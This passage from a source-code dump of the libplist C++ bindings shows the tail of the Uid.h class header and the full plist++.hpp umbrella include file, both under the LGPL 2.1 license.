Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef PLIST_UID_H 23 | #define PLIST_UID_H 24 | 25 | #include 26 | 27 | namespace PList 28 | { 29 | 30 | class Uid : public Node 31 | { 32 | public : 33 | Uid(Node* parent = NULL); 34 | Uid(plist_t node, Node* parent = NULL); 35 | Uid(const Uid& i); 36 | Uid& operator=(Uid& i); 37 | Uid(uint64_t i); 38 | virtual ~Uid(); 39 | 40 | Node* Clone() const; 41 | 42 | void SetValue(uint64_t i); 43 | uint64_t GetValue() const; 44 | }; 45 | 46 | }; 47 | 48 | #endif // PLIST_UID_H 49 | -------------------------------------------------------------------------------- /plist/plist++.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * plist++.h 3 | * Main include of libplist C++ binding 4 | * 5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved. 6 | * 7 | * This library is free software; you can redistribute it and/or 8 | * modify it under the terms of the GNU Lesser General Public 9 | * License as published by the Free Software Foundation; either 10 | * version 2.1 of the License, or (at your option) any later version. 11 | * 12 | * This library is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | * Lesser General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU Lesser General Public 18 | * License along with this library; if not, write to the Free Software 19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 20 | */ 21 | 22 | #ifndef LIBPLISTXX_H 23 | #define LIBPLISTXX_H 24 | 25 | #include "plist.h" 26 | #include "Array.h" 27 | #include "Boolean.h" 28 | #include "Data.h" 29 | #include "Date.h" 30 | #include "Dictionary.h" 31 | #include "Integer.h" 32 | #include "Node.h" 33 | #include "Real.h" 34 | #include "Key.h" 35 | #include "Uid.h" 36 | #include "String.h" 37 | #include "Structure.h" 38 | 39 | #endif 40 | --------------------------------------------------------------------------------